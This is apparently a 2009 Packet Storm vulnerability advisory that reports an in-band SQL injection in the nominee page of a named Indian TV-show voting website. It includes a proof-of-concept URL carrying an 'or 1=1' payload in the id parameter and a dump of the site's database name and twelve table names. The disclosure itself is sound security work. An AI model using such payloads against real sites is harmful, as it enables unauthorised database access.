mtvyouthicon.in.com SQL Injection

2009-02-18T00:00:00
ID PACKETSTORM:75026
Type packetstorm
Reporter Jaydeep Dave
Modified 2009-02-18T00:00:00

Description

                                        
                                            `====================================================================  
Website: http://mtvyouthicon.in.com/  
  
Category: TV Show [ Reality Show - Online Voting ]  
  
Vulnerability: Inband SQL Injection  
  
Founder: Jaydeep Dave [jaydipdave@gmail.com]  
  
Date: 16th Feb, 2009  
====================================================================  
== P O C ===========================================================  
  
  
URL:  
http://mtvyouthicon.in.com/nominee.php?id=50706  
  
  
Vulnerable URL:  
http://mtvyouthicon.in.com/nominee.php?id=-50706 or 1=1  
  
  
  
Database: mtvyouth  
[12 tables]  
+-------------------+  
| admin_action_log |  
| author |  
| cmslog |  
| comments |  
| content |  
| contentmanagement |  
| media |  
| mtv |  
| photo |  
| registeredvlog |  
| video |  
| votelog |  
+-------------------+  
  
====================================================================  
  
  
  
`